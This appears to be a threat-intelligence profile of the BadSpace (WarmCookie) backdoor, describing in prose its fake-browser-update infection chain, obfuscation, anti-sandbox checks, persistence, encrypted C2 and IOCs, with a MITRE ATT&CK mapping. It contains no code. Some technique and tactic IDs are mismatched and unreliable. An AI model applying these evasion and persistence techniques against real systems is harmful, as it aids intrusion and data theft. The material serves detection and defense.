|
| |
| |
| |
| |
| |
| |
| |
Type of information Stolen | System Information
Browser Data |
Overview
BadSpace is an emerging and sophisticated form of malware that has recently captured the attention of cybersecurity experts due to its advanced capabilities and evasive tactics. Discovered in early 2024, BadSpace represents a significant evolution in the landscape of malicious software, leveraging innovative techniques to compromise systems and exfiltrate sensitive data. Its development and deployment highlight an escalating trend in cyber threats, where attackers continually refine their methods to bypass traditional security measures.
Targets
Individual Users
How they operate
Infection Chain and Initial Access
The
BadSpace malware typically infiltrates systems through a multi-stage infection chain that begins with compromised websites. These sites often host malicious JavaScript code embedded within legitimate web pages or injected into JavaScript libraries such as jQuery. When a user visits an infected website, the malicious script sets a cookie to track their visit and subsequently constructs a URL with various query parameters including device information and user agent details. This URL is used to request a payload that replaces the original webpage. In some instances, users are prompted to download a fake browser update, which, upon execution, delivers the BadSpace backdoor or its JScript downloader to the victim’s system.
Execution and Obfuscation Techniques
The JScript files utilized in the BadSpace infection employ advanced obfuscation techniques to obscure their true intent. The obfuscation process involves shifting arrays and applying complex transformations to variable and function names. Notably, the JScript code uses a combination of dynamic function calls and external obfuscation tools such as JavaScript Compressor by Dean Edwards to further complicate analysis. Upon de-obfuscation, the JScript file executes a
PowerShell command to silently download and run the BadSpace backdoor. This is achieved using rundll32.exe to execute the downloaded file, ensuring that the malware remains concealed from casual detection.
Anti-Sandbox and Persistence Mechanisms
BadSpace incorporates several anti-sandbox techniques designed to detect and evade analysis environments. These techniques include checking the number of folders in specific directories, querying the Windows registry for particular keys, and evaluating system memory and processor details. The malware uses unique thresholds for these checks to differentiate between real environments and sandbox setups. Once it bypasses these checks, BadSpace establishes persistence on the infected system through scheduled tasks and self-copying mechanisms. It creates a mutex with a unique UUID for each sample and configures scheduled tasks to ensure the backdoor remains active even after system reboots or manual deletions.
Command and Control Communication
The backdoor communicates with its command and control (C2) servers using a sophisticated encrypted channel. Upon initial contact, BadSpace sends a cookie containing encrypted information about the infected system, including the computer name, OS version, and other identifying details. This cookie is encrypted using a hardcoded RC4 key and is sent along with a user agent string specifically crafted to include additional spaces, which led to the malware’s alternative name, WarmCookie. The C2 server can issue various commands to the infected system, including taking screenshots, executing command-line instructions, and reading or writing files.
Indicators of Compromise
To aid in detection and response efforts, several indicators of compromise (IOCs) associated with BadSpace have been identified. These include specific SHA256 hashes of JavaScript droppers and BadSpace binaries, as well as IP addresses and domains used for C2 communication. For instance, notable IOCs include the hashes for JScript files like c64cb9e0740c17b2561eed963a4d9cf452e84f462d5004ddbd0e0c021a8fdabc and domains such as uhsee.com and kongtuke.com.
MITRE Tactics and Techniques
Initial Access (TA0001)
Exploit Public-Facing Application (T1190): Delivered through compromised websites, often by exploiting vulnerabilities or injecting malicious code into JavaScript files.
Malicious File (T1203): Users are tricked into downloading and executing a fake browser update that contains the malware.
Execution (TA0002)
PowerShell (T1059.001): Utilizes PowerShell for downloading and executing the backdoor.
Command-Line Interface (T1059.003): Uses rundll32.exe for executing the payload.
Persistence (TA0003)
Scheduled Task/Job (T1053): Creates scheduled tasks to ensure persistence.
Registry Run Keys/Startup Folder (T1547.001): Uses registry entries and scheduled tasks to maintain persistence.
Privilege Escalation (TA0004)
None explicitly observed in provided data, but often malware will attempt privilege escalation to enhance its capabilities.
Defense Evasion (TA0005)
Obfuscated Files or Information (T1027): Employs complex obfuscation techniques in JScript and DLL.
Anti-Sandboxing (T1497): Implements anti-sandbox techniques to avoid detection in analysis environments.
Credential Access (TA0006)
None explicitly observed in provided data, though some backdoors may collect credential information as part of their functionality.
Discovery (TA0007)
System Information Discovery (T1082): Collects system information such as OS version and computer name.
Lateral Movement (TA0008)
None explicitly observed in provided data, though lateral movement could occur if the malware spreads within a network.
Collection (TA0009)
Screenshot (T1113): Capable of taking screenshots as part of its command set.
Exfiltration (TA0010)
Exfiltration Over Command and Control Channel (T1041): Sends collected data and system information back to the C2 server.
Impact (TA0005)
None explicitly observed in provided data, though backdoors generally impact system integrity and security.
References
